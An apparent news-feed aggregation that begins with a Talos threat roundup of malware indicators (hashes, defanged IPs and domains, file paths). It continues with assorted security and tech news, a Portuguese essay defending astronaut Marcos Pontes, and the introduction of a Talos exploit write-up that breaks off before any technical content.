  • 0280026374e8bc24bd0987abde9c8ded202bc489e0f718c2fbd87d541f2003e0
  • 03262248439bc3ed3af3cc12a50d3595a0230b6a01fd3c6e34838750a01a4b72
  • 03480a5dda4243eec0e9826a386729670c50c9cdcfd12109febf16695e7302ce
  • 03746100716d1a66312b69c03ba2166aab6075f24ca826197972bf30a117dadb
  • 03c2c34bd542dde2d600697bb658399498be9ff74614ab938adb3f77a4183c4c
  • 0462f5a9a36956eb62b958203d66e1ad83268502f7ee6a2676e47d3829db1e03
  • 06c57ae21c9f839895f847a5d8895fdc89e878a615565772246c94887caaf6cb
  • 075b5ad9b36d79b3b14ad43decabdd7f07fbd3d428e890a14ee2af4969ba49e5
  • 08866b56758d4c7b783af2faa3465a9c3dcb2621b19ded098ccb17e25e4f685a
  • 08db11f50735c3f4d34d308bc190ae8db0cc6b291090716781ced208b13743fa
  • 0a00e118d1917356a4598d2e5f3a96f184726cb37e6be4cfa70ad233fcf5be8a
  • 0a0e93af895754435be151f0f09d3fcd542661c9e48314a82bfa4853be9212fe
  • 0a4d7fbd10835ba00bd6518598f0c3a4670207e52e4c8c57a5500f0c4059a017
  • 0a963367e108b56e58559846236f1896adcca5ec6e324330739e3b45d436e1dd
  • 0b675493051c7f99878bca3510c5054bbc071612557acb008e9ae8980c6364ed
  • 0b7143f5062cada3d26a97f59b10ddf8e2a73ea70dc97c7cb55a5ceef7e7e5d8
  • 0b76777a484d6e0304bfc0b0c06576a51bca2a5cf6a648dfdf67f296301af3d4
  • 0bc190d365d58acc24ec202637d87296c69c9f2d2dc4e7120d8f3b61ffc584bc
  • 0c4533fd8ae2a9629f474373ce2697059e978e8f5945b4421d092a7052b9c64c
  • 0e12afb0ec9aca39a02927e158883994dc6110f83880b5075aebcaed8077ce36
  • 0ef146b745e8b57ed0f3b0cd888f650fb8510670731e5c01419e13722178d1d9
  • 114f30f079e04714958728d7364b706dd8e88a241bd0771326d10c445d4fc95c

Coverage
Screenshots of DetectionAMP




ThreatGrid




Win.Malware.Sivis-6734391-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • \$Recycle.Bin\<USER-SID>\$RZ7KADN.txt
  • \$Recycle.Bin\<USER-SID>\$RYGDGS7.lnk
  • %AppData%\Mozilla\Firefox\Profiles\iv5rtgu3.default\key3.db
File Hashes
  • 2073825ad497c12861800c93527e49e8aa4afafe77d1a7af2922ab707c4b258e
  • 2c43a96efe6f36ef0e1e1ca7f4dfe34c83bdd1d99090a056d43955e70bae719f
  • 2ff58a8b69dcb0dbb1ef63430a925068d586860c84faa583988b92e2bb87ef25
  • 30a9b4c8db8eae33a1e9c35f6441e171cb8059a0f6c34bc8d377e064f3000008
  • 32e5b6a36aa94734f0af2cc7d2235bbfeecc915fc0bc0bf46f385f238dc1b69d
  • 32fb050134eefd9bba3f5a1d31c9727c0a25760e8b2342385b24b20a253e9512
  • 34c5950ff21c25a4acbc1801f881d205ba2cae42333bb04358cf5117eef645b2
  • 447e4f61b3e3a5ccf116346d228d1b80328a63e54fc71398e4894d70c22ff51d
  • 4d6ac5ccca2bab50f296a4e34a7bed16131f01fdf6864c2bee8efbfea449697b
  • 51a9bf24550ec6db0e383fbe1e9089558e1d1bd4e57c5d3678a95233efd59dab
  • 581391e344bda3539189aef8252556f916bf27333e755765641a1485844b884f
  • 66ada213ce8d9756c1c711d216d45ef8cc84586a1dc46213ce8275d4f8a7d08f
  • 7d0ab4517139c8347e39af92cf8dafb9c71e80a8848cea25d7e4598292753fac
  • 7f49ac352ec83b003ca00b29acafdf5c08132f0bd060151312157773e06a887d
  • 8564af9b09f0ade9b372d76a0d53355587b28cc89afec83b9287cebe6dbce148
  • 8cca573e22a563ae4074007c9b5c5abd11316a0235f206242baf4936f3cff4fb
  • 91487940c217c106a1f70ea4f850db083396a8fd5c37e81c47d4cd01ef269906
  • 9813d3fa86989ca43ecc0db5684e642823abebca58161d8676276349bb5c53ea
  • b3be19db0aa19fc9588cb90d0ee5c39ae124e797b82ba1eeb02ba0b82c9a55f8
  • beb78637a890b73e150cc67b1c51108dc89e7b3e491ed22cc81695eda729e10f
  • c405942083f1d75a6de07f9270e94594cfd99b59c774f22bd2c214715822a851
  • c5405c94a49bd14155027aea5722bf253eeedd1a3d0d1d73a2580adb70a6def7
  • cc542bacf782757a362d3b6cfc54efe64f8abb860f7c997cf008cc0ae9ffcee6
  • d2f9541628e3178b1e6cead482d9983e1509edd3155244b42ac49f0a6919d690
  • d7ecfd142025e761006a446d1bd68a9f337eaf1f927fbc01fbbe336df39befae

Coverage
Screenshots of DetectionAMP




ThreatGrid



Win.Malware.Explorerhijack-6734396-0
Indicators of Compromise
Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SESSIONINFO\1\LogonSoundHasBeenPlayed
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 103[.]235[.]47[.]123
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\347749632.exe
File Hashes
  • 0387a6fcadc71d0fd723b94049d312eb81752994f06d6e11a222c20c81d610a8
  • 39ad7614f81cf505be13fb726d9a68585ebcfb4ba3c156e7974e23a71c8254f1
  • 41569db09055ec3bbd900f943c3049b6362be1fc08e73bf9403c6e0a684b5aed
  • 7f25aa88bb56ce9888d3959344307b5c7423f53ef1409f84534dd82f2520eb92
  • 856c90d502181b0297d792c67ab0d5e3d78fac4879e853beab00e10707e1c5dd
  • 99e9c70014473728f7cfac4704c4961cb9cf1e6cb015bb1da6bb095fea13ecaa
  • a4143241cfa447db8fa7d4ec5ef79a6bd0a78b853d8f461f209e1224ea09f34f
  • e957fa484e5b1b1c84a0f4d3e3561686fe6d289f703ec2ff1f4d9fec886e1344
  • f57061d301bce0ecb0b1caf8b0e0de238ecccd4f038f4e9a397ab1cdde57e9a2
  • fd047bf2512554e75ffe684d07d0cb5ee798409fb504e2db7a13b90cfc7070e0

Coverage
Screenshots of DetectionAMP



ThreatGrid




Xls.Malware.Cwsp-6735643-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 212[.]58[.]244[.]48
  • 208[.]91[.]197[.]13
Domain Names contacted by malware. Does not indicate maliciousness
  • lalecitinadesoja[.]com
  • downloads[.]bbc[.]co[.]uk
Files and or directories created
  • %LocalAppData%\Temp\1ii4ushk.rdy.ps1
  • %LocalAppData%\Temp\i3iu3ax4.unx.psm1
  • %AppData%\23C.exe
File Hashes
  • 05997180a42ca9c01720b1ee3e759bd1a408c0064bbdac0c72f56c9783102a1f
  • 07a8a906e93699e23b1b7fe6a190edf709d499efdb806a334d63d21e87d47fea
  • 0d4e2eeb6402ecbfed9d9f70a4386ba988d96baa4570944ad7d25fda4e1360b5
  • 1007b22475717247803c61a571c881bf50d93199f21559bfaa2b0651e3e88b99
  • 11cd2e32f5b99a2988d75e7c6b7b372645385fa0b2f266084cf79a674fa87d54
  • 12cb9af05b67398d8e32296f872fcf38485cb5bfb248882a039c901f917744c7
  • 199abec0369aa5b56ccf3e40104dec650c0c621a4bf9fe892cde4c649951d96c
  • 2436eb88be5cb4536470f00aa4e0b2204c938a7ccc1ab1512c51371c056083bb
  • 2b99f6c10d40f9437e4f81c102829e5dd177b7ba83f04d0b09ca13fd35d4f37a
  • 2e1d18fa4a0c1b7f1a840f0cbe366bed742fd882ba5ba7c32177fe4384d3feeb
  • 2fcb4649130e60c9ee30bc0109dd276dfc20b58873098466740c95bae14e8b16
  • 2fda76c3f4db61bd48ffefbe06625cbf33c84c9a99bfb5e4b078efab041786be
  • 4c7833eda85621233fcf983d797da0a473e4d17bc8a6b5572eb475e1132f9604
  • 4cf4a24b619e53b5155e2aa5eebcbd4a935b03bc2a99f703e955d26bfdc89834
  • 522dea36276bb7616dabda4f46e9bd93fb5fac7dc8c035e2677febac8a9ac268
  • 53bfd8dcca2dd1a702c80a92e52b6149c3b6d9dd69cfc616c6ece3931920aa0b
  • 56ee72c3cac7e50c20945307e9f58360e097782ee10a5577323f1cee22caeb3d
  • 5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7
  • 5dfef0b6f4f1b612edf80c8ab5cffc7556677bb07c53934963b550b60cf84474
  • 6534a9d590748b2301a3f804b75fe02ffee39acf82d2dbb93800a3f8923c9934
  • 6b83c696d85d8f467ee9ff306ef266c6b64c8cb4e0aad99f4b5627f6e2dd3c33
  • 6c891decc602dc22ae6084be690674afdb405c5b7072a0e8b46d77ba8e331237
  • 6da86b5ba028ddfd9646da6467cdaca4d698b72b165045561bcf7a65449dba85
  • 7546344c7c370e86f9975710269a9c965104d6084fe4b51d8713c37cd277c2da
  • 75a14beabec965f401a21c1809b7fe9563ced7366c863e78dd5c744516aea83d

Coverage
Screenshots of DetectionAMP




ThreatGrid



Umbrella



Malware




Win.Trojan.Mikey-6735890-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • qazwsxedc
IP Addresses contacted by malware. Does not indicate maliciousness
  • 52[.]1[.]22[.]171
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]easycounter[.]com
Files and or directories created
  • %WinDir%\cer61A0.tmp
  • %TEMP%\adminpak.msi
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\adminpak[1].exe
  • %WinDir%\cluster\clcfgsrv.inf
  • %WinDir%\cluster\cluadmin.exe
File Hashes
  • 04a44c6f9ee4b5f944038452d2669a9915e493f3d4aedd8603af6bcbf9fb157d
  • 075ef3a40de2c10d52140c02fc604654e60eb1231659122640d93884a8f639d8
  • 1ed41ccdce4f7c67dbeb57873ed69a0b53bd8c509a66f391fb4838cd26d32f88
  • 4e8da970321ee8e38f2fe918ce8755ce504d0c54ad579c7a2d388ed65aceca3f
  • 63562fa34ca55cbbc1f007ed6a199b625f277f02487d18c6a9a8e24354af6ea3
  • 72b02849c7cde8ba42dfe04edf18b0ede900c66187a9e38f5d16eaf84ddfbfbe
  • 764947d95583d3a134fc96d6ce06ce4175261d3b9b48d224238367054e187d93
  • 77515fa3f7bea9043e954ac8cb13917edd930d0e5d87f2cbc9fa4d44bd281161
  • 7ea545f0dd17684011d7bbdde7c004faccacd8edb6d011c4e023f2780279ae1f
  • 92e4863e96df84117c1288ceb692823a6d86c0b3a09f29a5cbc4af6a83a03415
  • 9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80
  • a36d16238efb3b5f2ba5e9c23dd1db26a6b08fce8fa1d824e3006bc05f12a75f
  • b63310bff942d0fe4f131fbb777737b110ab630876e784ac843e0c4dcdebde44
  • bdc574d0160c6566738b039122d702a47aa10080b096cc3ca2729a2a5ca5f6f6
  • cf7236e1d8783d00cd54d9d821a1067a2c08cd7cb67b0c091f5826784403f67a
  • d7096f8904ebef796193afca1737f99e65c07ac7cf3c999aa46b5e60428ca006
  • dba090f098676f7f4d5bd9e71a5b24cb1dfc71edb6b8a0dc06082a60730a81d0
  • ed2893a0c58fbfaf73acdd4d7a7c9d8626e8609573739e8f0bf11c88d4b07303
  • f9de2da81894bbde4f6baf5909c3f3f6a5d5fc61a8df97836fb8db14fbdb6006
  • ff453440448d5f950a573ab246092a3c80e33c7c9189d97d15539bf09c48211d

Coverage
Screenshots of DetectionAMP



ThreatGrid



Accused CIA Leaker Faces New Charges of Leaking Information From Prison

THN - Fri, 02/11/2018 - 07:16
Joshua Adam Schulte, a 30-year-old former CIA computer programmer who was indicted over four months ago for masterminding the largest leak of classified information in the agency's history, has now been issued three new charges. The news comes just hours after Schulte wrote a letter to the federal judge presiding over his case, accusing officials at Manhattan Metropolitan Correctional Center of

Apple vendeu 46,9 milhões de iPhones no 3º trimestre civil

MeioBit - Thu, 01/11/2018 - 20:03

Nesta quinta-feira (01/11) a Apple apresentou o relatório financeiro do quarto trimestre fiscal de 2018 (Q4 FY 2018), período que corresponde ao terceiro trimestre civil do ano, abrangendo os meses de junho a setembro. Sem maiores surpresas, a Maçã de Cupertino continua a ser uma empresa gigante e saudável.

Vamos aos números:

RELATÓRIO FINANCEIRO DA APPLE Período → Q4 FY 2017
(julho a setembro de 2017) Q4 FY 2018
(julho a setembro de 2018) Diferença Receita US$ 52,58 bilhões US$ 62,9 bilhões + 19,63% Lucro US$ 10,71 bilhões US$ 14,13 bilhões + 31,83%

No panorama geral, vemos um belo aumento de 19,63% na receita em relação a Q4 FY 2017 e um senhor aumento de 31,83% no lucro trimestral, que somou US$ 14,13 bilhões no Q4 FY 2018. Quais os responsáveis pela bela receita de 62,9 bilhões de dólares do quarto trimestre fiscal da Apple?

Apple Park em junho (crédito: Toby Harriman)

Abaixo temos o sumário de vendas por setor:

SUMÁRIO DE VENDAS DA APPLE Período → Q4 FY 2017 Q4 FY 2018 Diferença Receita
Q4 FY 2018 diferença
em relação a
Q4 FY 2017 iPhone 46,68 milhões de unid 46,89 milhões de unid + 0,45% US$ 37,185 bilhões + 28,9% iPad 10,3 milhões de unid 9,7 milhões de unid – 6% US$ 4,09 bilhões – 15% Mac 5,4 milhões de unid 5,3 milhões de unid – 2% US$ 7,4 bilhões + 3% Serviços — — — US$ 9,98 bilhões + 17% Outros produtos — — — US$ 4,2 bilhões + 31% TOTAL: — — — US$ 62,9 bilhões —

Com o número de vendas estáveis nos smartphones, o iPhone X foi o grande responsável pelo aumento anual da receita do quarto trimestre fiscal da Apple. O smartphone teve a média de preço de US$ 793, um aumento de 28%. A média de preço dos iPhones vendidos era de US$ 618 no Q4 FY 2017.

Os iPads tiveram grande queda na receita, e, assim como os Macs, os tablets viram pequena queda nas vendas. Fenômeno normal pois são produtos duráveis, cujos consumidores trocam só quando quebram. E no caso dos Macs, há forte concorrência. As médias de preço foram US$ 422 (– 9,8%) para os iPads e US$ 1.399 (+ 5,1%) para os Macs.

Os mais de 200 milhões de assinantes do Apple Music, Apple Pay e iCloud fizeram a Maçã de Cupertino arrecadar US$ 9,98 bilhões. Um crescimento de 17% em relação ao trimestre correspondente do ano anterior. Outros produtos (incluindo a linha iPod, Apple Watch e aqueles fones da Beats) responderam pelos US$ 4,2 bilhões restantes da receita global da Apple no terceiro trimestre civil de 2018. Alta de 31% na arrecadação em relação a Q4 FY 2017.

Apple is going to stop providing iPhone, Mac, and iPad sales. So nobody will know how sales of the future MacBook Airs or iPad Pros are going. That’s a big change. https://t.co/dumpPmMsjS

— Tom Warren (@tomwarren) November 1, 2018

Bom lembrar que no próximo trimestre (Q1 FY 2019) a Apple não vai mais divulgar os números de vendas dos iPhones, iPads e Macs. Aí vai ficar mais difícil para nós entusiastas tentarmos deduzir a média de preço dos aparelhos vendidos e especular os motivos. A Maçã de Cupertino deve ter seus motivos, assim como a Microsoft tem para esconder as vendas do Xbox One.

Fonte: 9 to 5 Mac.

O post Apple vendeu 46,9 milhões de iPhones no 3º trimestre civil apareceu primeiro em Meio Bit.

Two New Bluetooth Chip Flaws Expose Millions of Devices to Remote Attacks

THN - Thu, 01/11/2018 - 16:48
Security researchers have unveiled details of two critical vulnerabilities in Bluetooth Low Energy (BLE) chips embedded in millions of access points and networking devices used by enterprises around the world. Dubbed BleedingBit, the set of two vulnerabilities could allow remote attackers to execute arbitrary code and take full control of vulnerable devices without authentication, including

CyberVets U.S.A.: The mission after transition

Talos - Thu, 01/11/2018 - 16:48
Christopher Marshall, a veteran of the U.S. Navy, currently serves as Director of Cybersecurity Research for Cisco Talos Intelligence Group.

As a veteran of the U.S. Navy, I’ve had the opportunity to use some of the greatest technology this country has to offer — from night vision goggles, to thermal cameras, to radio and satellite command and control equipment — even the care and feeding of nuclear reactors. When it was time for me to transition from the military to the civilian world, my post-military career led me to work for the Cisco Talos Intelligence Group, where I’ve found that many who served are also excellent teammates in the fast-paced, ever-shifting domain of cybersecurity. These men and women exhibit leadership, teamwork, inclusion, integrity, efficiency, and (importantly) the ability to acquire technical prowess. These are highly desirable traits in any industry, especially one that is predicated on trust and a willingness to always learn and evolve.



Within the next few years, we are facing the global reality of nearly 2 million unfilled cybersecurity jobs, which poses a threat to our national security, businesses and the local community. At Cisco, and Talos in particular, we recognize the value veterans bring to the workplace. We strive to create opportunities for the training, hiring and advancement of veterans because of the intangibles they bring with them. A major obstacle we face in that endeavor is how to support the military community as they transition to the civilian workforce at a rate of over 200,000 each year. In November 2016, Virginia announced the Virginia Veterans Cyber Training (VVCT) program, or as we at Cisco call it, CyberVets USA. Leading the partnership alongside Amazon Web Services and (ISC)2, Palo Alto Networks, and Fortinet, Cisco launched a free online entry-level cyber training pilot for 200 veterans who want to work in Virginia’s cybersecurity industry.
Today, we are excited to announce a CyberVets USA program in Talos’ backyard here in Maryland with the help of Lt. Gov. Boyd Rutherford, in conjunction with a proclamation to make this November “Hire-a-Veteran Month.” Additionally, NetApp and the National Development group have joined on for the Maryland program. Developed to address a growing talent gap in the cybersecurity arena, CyberVets USA is an industry partnership of cyber-focused companies offering free training and certifications to the military and veteran community. In collaboration with the Departments of Labor, Commerce, and Veterans Affairs, as well as several of Maryland’s state colleges and universities, this program provides the training needed to develop the extrinsic skills to succeed in the cybersecurity workforce while capitalizing on the intrinsic values that hiring veterans brings to the commercial workforce. (To learn more, click here.)
Additionally, in the near future, Cisco will be launching other programs that include a targeted employer matching program, a proprietary matching engine to map military skills and newly earned certifications, linking veterans to the thousands of jobs posted by any one of Cisco’s 60,000 channel partners across the globe.
With the support of the governor’s office and the state of Maryland, the CyberVets USA program will identify, train, and help find next-generation tech jobs for the veteran and transitioning military population of Maryland, giving the vets their next mission after transition. I am proud to continue my journey with a company dedicated to serving those who served and look forward to welcoming veterans as they join the Cisco team.
To learn more, visit cs.co/CyberVetsUSA.

Sobre martelos, penas, professorinhas e plantadores de feijões

MeioBit - Thu, 01/11/2018 - 14:01

Christa McAuliffe não era uma astronauta. Não sabia pilotar um shuttle, não tinha idéia de como calcular uma órbita, trocar uma unidade AE-35 ou era qualificada para usar um traje espacial. Ela também não era uma cientista. Não conhecia a Equação de Foguetes de Tsiolkovsky, e provavelmente era incapaz de descrever ou entender a mistura de co-polímero polibutadieno-acrilonitrilo usada nos motores auxiliares. Mesmo assim ela iria viajar no Ônibus Espacial.

Christa foi escolhida entre 11 mil candidatos para o programa Professores no Espaço, e era isso que ela era: uma simples professorinha de estudos sociais no ensino fundamental. Ela passaria 6 dias em órbita, mas não descobriria nada, não avançaria a Ciência. Isso a um custo de 65 milhões de dólares, fora o custo de seu treinamento e um ano de salário dos dois empregos que a NASA pagou, quando ela se licenciou para treinar para a missão.

A missão era ser a primeira do programa Professores no Espaço, criado por Ronald Reagan em 1984, e desses US$ 65 milhões ela valia cada centavo.

O trabalho de Christa não era ampliar as fronteiras da Ciência, era muito maior que isso: ela estava lá para inspirar as novas gerações, reacender nas crianças a centelha da curiosidade e da exploração, que os adultos e o sistema educacional tão eficientemente cuida de apagar assim que pode.

No Brasil acha-se que investir em educação básica é comprar tijolo e construir escola, sem se preocupar com detalhes como o salário do professor ou se vai ter dinheiro pra comprar giz. Nos EUA há (ou havia) uma preocupação com o processo como um todo, começando lá bem cedo com as crianças.

Quando o Sputnik atravessou incólume o céu dos EUA, houve uma verdadeira revolução com bilhões de dólares direcionados para escolas e universidades. A Corrida Espacial seria vencida pela tecnologia.

O foco dos EUA é investir bilhões de dólares em STEM — sigla em inglês para Ciência, Tecnologia, Engenharia e Matemática, e a viagem de Christa McAuliffe era parte desse investimento. Um governo com visão entende que para fazer algo é preciso gente com vontade de fazer, e a Ciência e a Exploração dependem de novas gerações trilhando o caminho aberto pelas antigas. Christa iria criar os cientistas do futuro.

Inspirar crianças para a Ciência é algo tão importante que na Feira de Ciências da Casa Branca o homem mais poderoso do mundo se ajoelha para examinar um robô feito por estudantes.

Muita gente diria que é desperdício de tempo do presidente dos EUA acompanhar de perto uma feira de ciências que não vai descobrir nada de novo, mas não é esse o objetivo. Quando foi apresentar seu foguete na Feira Nacional de Ciências em 1960 Homer Hickam (cuja história você pode conhecer no excelente filme e livro October Sky) se perdeu no prédio procurando por Werner Von Braun. Quando voltou ele já havia passado pela mesa de seu projeto, e declarou que “aquele era o melhor foguete que ele já tinha visto fora do Cabo Canaveral”.

Hickam, filho de um mineiro e com tudo para viver e morrer na irrelevante cidade de Coalwood, WV, se formou em engenharia e foi trabalhar na NASA, não só como engenheiro mas como treinador de astronautas também.

Para gente imediatista não faz sentido o governo gastar uma fortuna com uma feira de ciências para crianças, e em plena corrida espacial, Werner Von Braun perder seu tempo passando um dia inteiro vendo projetos de crianças?

Felizmente também há muita gente que não pensa assim, e vê a divulgação científica como algo estratégico para seus países e para a Humanidade como um todo. É aliás o único trabalho terrestre que astronautas não reclamam. No dia-a-dia eles são obrigados a cuidar de papelada, participar de intermináveis reuniões e fazer política, mas quando dão sorte, são chamados para visitar escolas e museus, receber crianças, responder perguntas e contar suas aventuras.

Isso funciona? Muito bem, a geração atual teve como ídolas a geração anterior, e veja esta foto de crianças ouvindo Jim Lovell em um museu:

Eu não me surpreenderia se daqui a 20 anos a garotinha do lado do moleque abraçado com a pasta estivesse comandando uma nave da SpaceX e pousando em Marte. A expressão dela diz tudo.

Nós somos ensinados que Ciência é difícil, ciência é coisa de nerds estranhos que falam línguas indecifráveis e não têm qualquer contato com a realidade. Como o povo vai ter interesse em Ciência se aprende desde cedo que é difícil demais pra ele?

Países sérios fazem de tudo para popularizar a Ciência, como o Canadá, que gastou o equivalente a US$ 50 mil para colocar o astronauta Chris Hadfield conversando por 22 minutos com crianças de uma escola na Terra.


NASA — Hadfield Chats with Hadfield School Students Back Home

Fora isso, ciência não é só o LHC, nem todo mundo nasce sabendo, Christa McAuliffe iria fazer experimentos básicos em órbita, que seriam repetidos em terra por alunos em escolas por todo o país. Daria uma aula direto do Space Shuttle para seus alunos na Concord High School. De novo: no papel não faz sentido, é mais barato dar aula de terra, mas quantas mentes e corações isso não iria conquistar?

Em 1971 a NASA fez um experimento besta, para provar que Galileu estava certo. No papel, totalmente desnecessário, já sabemos que o peso de um objeto não afeta a velocidade de sua queda, a força gravitacional é a mesma. Ao contrário da Lenda Galileu não descobriu isso jogando balas de canhão da Torre de Pisa, ele usou planos inclinados, mas a NASA usou… uma pena.

Durante a missão da Apollo XV o astronauta David Scott fez um experimento ao vivo na TV: segurando um martelo de 1,3 kg e uma pena de um falcão ele deixou os dois caírem de uma altura de 1,6 metro. Segundo Galileu, sem a resistência do ar ambos deveriam cair na mesma velocidade:


Nikolas Zane — Feather & Hammer Drop on Moon

Esse experimento já foi feito milhares de vezes em terra, em câmaras de vácuo e muito mais barato, mas qual vídeo você acha que faz as crianças dizerem “UAU!”?

Feijão no Espaço

Isso tudo nos leva à mais estúpida crítica sobre a nomeação de Marcos Pontes para Ministro da Ciência e Tecnologia: a de que ele foi plantar feijão no espaço.

Curiosamente não ridicularizam a NASA/ESA por fazerem a mesma coisa, com o programa SEEDS IN SPACE, cujo propósito básico é educação e divulgação científica. Sementes são enviadas para a Estação Espacial Internacional e os astronautas plantam não feijão — gringos não curtem — mas alface, como nesta imagem do astronauta francês Thomas Pesquet:

Ao mesmo tempo são enviados kits para escolas, as crianças plantam as sementes e cuidam delas, regando e acompanhando em sincronia com os astronautas em órbita, e o crescimento é comparado. Em um experimento desses em 2004 foi replicado por 70 mil crianças em escolas na Holanda.

Ninguém nos EUA ou na Europa acusou os astronautas de plantadores de feijão.

O experimento que Marcos Pontes fez na ISS não foi novo, sementes foram a primeira forma de vida a ir ao espaço, lançadas em uma V2 pelos EUA em 1946, ele não pretendia descobrir nada de novo, nem era função dele. Marcos Pontes não é um cientista, como não era Neil Armstrong ou Yuri Gagarin. O primeiro astronauta cientista de verdade foi Harrison Schmitt, que voou na última Apollo, a XVII. Pontes e Armstrong são profissionais altamente qualificados e habilitados a executar experimentos científicos, como todo astronauta.

Inspiração, quer que desenhe?

O experimento da Missão Centenário não tinha como objetivo salvar o mundo, era bem mais ambicioso: inspirar o deslumbramento com a descoberta e a curiosidade científica nas crianças. Marcos Pontes plantou e acompanhou a germinação de sementes de feijão em conjunto com alunos de várias escolas municipais de São José dos Campos. Mas ele não plantou só feijão.

Ele também plantou Gonçalo-Alves, uma árvore em extinção que você nunca ouviu falar, como parte de um experimento da EMBRAPA, que queria melhorar as técnicas para a preservação ambiental e desenvolvimento sustentável.

Ele não plantou só feijão

Marcos Pontes fez mais experimentos em 9 dias e 21 horas no espaço do que a maioria de seus críticos fez na vida inteira. Foram oito experimentos, criados por diversas instituições:

  1. Efeito da microgravidade na cinética das enzimas — Centro Universitário da FEI (Faculdade de Engenharia Industrial);
  2. Danos e reparos do DNA na microgravidade — UERJ (Universidade Estadual do Rio de Janeiro) e INPE (Instituto Nacional de Pesquisas Espaciais);
  3. Teste de evaporadores capilares em ambiente de microgravidade — UFSC (Universidade Federal de Santa Catarina);
  4. Minitubos de calor — UFSC;
  5. Germinação de sementes em microgravidade — Embrapa (Empresa Brasileira de Pesquisa Agropecuária) e Cenargen (Unidade Embrapa Recursos Genéticos e Biotecnologia);
  6. Nuvens de interação protéica — Cenpra (Centro de Pesquisas Renato Archer), do Ministério de Ciência e Tecnologia;
  7. Germinação de sementes de feijão — Secretaria de Educação de São José dos Campos (SP);
  8. Cromatografia da clorofila — Secretaria de Educação de São José dos Campos (SP).

Ele não foi passear, não foi um “turista”. Pontes cumpriu o duro papel de tentar salvar a cara de um programa espacial marcado pela incompetência e politicagem suprapartidária (se o Lula sacaneou o Brasil na ISS, aprendeu com FHC que fez o mesmo).

Pontes foi um pioneiro, o primeiro brasileiro no espaço. Não era função dele gerar lucro ou trazer novos métodos de manufatura avançado a indústria nacional. A principal função dele era ser um símbolo, mostrar que em algum momento, se levantarmos a cabeça do capim, conseguimos fazer coisas grandes, e que mesmo aos trancos e barrancos uma criança nascida no Brasil PODE sonhar em explorar o espaço.

De resto, as acusações de que “ele não fez ciência” são ridículas. O piloto do Beagle também não fez ciência mas sem ele Darwin teria que aprender a nadar. Pontes fez ciência sim, a parte mais importante, a experimentação, sem experimentação ciência é apenas filosofia, aquela estranha escola de pensamento onde Aristóteles dizia que homens têm mais dentes do que mulheres e nem ele nem seus discípulos se deram ao trabalho de contar.

Aqui alguns dos papers baseados nos experimentos de Pontes em seus 9 dias na Estação Espacial Internacional:

Isso tudo eu achei em menos de 5 minutos de pesquisa. Mas é mais conveniente chamar de plantador de feijão.

Pontes foi uma tentativa fracassada de inspirar um povo que odeia seus ídolos, constrói pedestais já pensando em jogar o sujeito lá de cima. O ataque da mídia a Pontes mostra mais do que partidarismo cego, a falta de visão, a incapacidade de entender que às vezes é mais importante inspirar do que fazer. Estamos condenados a só admirar gente com uma bola no pé, um microfone na mão ou uma webcam na cara.

Pior, essa tendência ao obscurantismo é mundial. Christa McAuliffe morreu na explosão da Challenger, 73 segundos após a decolagem. O programa Teacher in Space foi cancelado. Homer Hickam foi xingado por millennials no Twitter, Trump cancelou a Feira de Ciências da Casa Branca (depois de prometer mantê-la) e Marcos Pontes está sendo xingado por todos os lados.

No Twitter vieram me explicar que um Engenheiro Aeronáutico com mestrado no exterior, astronauta, cosmonauta, piloto de testes, com bacharelado em Administração pública e um currículo destes, não é qualificado o suficiente para ser Ministro da Ciência e tecnologia.

Curioso é dizerem que esse currículo e “só um mestrado” não bastam para ser Ministro de Ciência e Tecnologia, mas ninguém levantou essa bola quando o ministro era o Aldo Rebelo, um jornalista que propôs uma Lei punindo inovação tecnológica, um ministro famoso por ter criado o Dia Nacional do saci-pererê e negacionista do aquecimento global.

Sinceramente eu tenho sérias dúvidas de que Pontes conseguirá promover a Ciência em um país que a odeia, e não acredito na promessa do Ornitomito de dar R$ 10 bilhões para a pasta. O presidente é profundamente ligado à bancada evangélica, e isso nunca é bom sinal pra Ciência.

Fora isso há argumentos de que Pontes não tem experiência como articulador político. Há controvérsias: por quase 10 anos ele foi o intermediador entre o Brasil e a NASA, e conviveu o bastante com os bastidores do poder para saber como ele funciona, mas é um argumento até aceitável.

O que não dá é ignorar todo o currículo e a história do sujeito e desqualificá-lo de forma baixa e rasteira. Se você acha que Marcos Pontes é um mero plantador de feijão, você que vá plantar batatas!

Fontes
  1. Conheça os oito experimentos brasileiros levados à ISS
  2. Made in Brazil O Brasil na Estação Espacial Internacional
  3. Marcos Pontes – Currículo
  4. Wikipedia – Aldo Rebelo
  5. Trump Leaves Science Jobs Vacant, Troubling Critics
  6. Prefeitura Municipal de São José dos Campos
  7. Gazeta do Povo
  8. Dear Nobel Winners, Mr. Trump Has All the Brains He Needs
P.S.:

Antes que comecem com o “mimimi ele vende travesseiro”, eu pergunto: você paga os boletos dele? Pois é, quando as contas chegam a gente faz o que tem que fazer. De resto, Buzz Aldrin pisou na Lua e depois anunciou fuscas, vai lá reclamar com ele.

O post Sobre martelos, penas, professorinhas e plantadores de feijões apareceu primeiro em Meio Bit.

Talos Vulnerability Deep Dive - TALOS-2018-0636 / CVE-2018-3971 Sophos HitmanPro.Alert vulnerability

Talos - Thu, 01/11/2018 - 13:00
Marcin Noga of Cisco Talos discovered this vulnerability.

Introduction
After disclosing two vulnerabilities in Sophos HitmanPro.Alert on Thursday, Cisco Talos will show you the process of developing an exploit for one of these bugs. We will take a deep dive into TALOS-2018-0636/CVE-2018-3971 to show you the exploitation process.

